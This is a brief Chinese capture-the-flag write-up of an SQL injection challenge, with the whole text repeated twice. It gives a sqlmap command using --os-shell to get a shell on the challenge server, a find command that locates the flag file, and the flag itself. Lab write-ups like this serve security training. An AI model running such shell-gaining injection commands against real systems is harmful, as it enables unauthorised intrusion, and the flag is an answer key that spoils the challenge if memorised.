打开容器后发现好像是sql注入类的问题,先尝试查找注入点发现出现的flag的值竟然是错误的值。
再查看提示,
先用sqlmap跑一下,
sqlmap -u 'http://challenge.qsnctf.com:30401/?id=1' --os-shell
再查找带有flag的文件名,
find / -name "flag"
找到flag文件。
拿到flag。
qsnctf{43099213046f4231a57ba074bfc24104}
打开容器后发现好像是sql注入类的问题,先尝试查找注入点发现出现的flag的值竟然是错误的值。
再查看提示,
先用sqlmap跑一下,
sqlmap -u 'http://challenge.qsnctf.com:30401/?id=1' --os-shell
再查找带有flag的文件名,
find / -name "flag"
找到flag文件。
拿到flag。
qsnctf{43099213046f4231a57ba074bfc24104}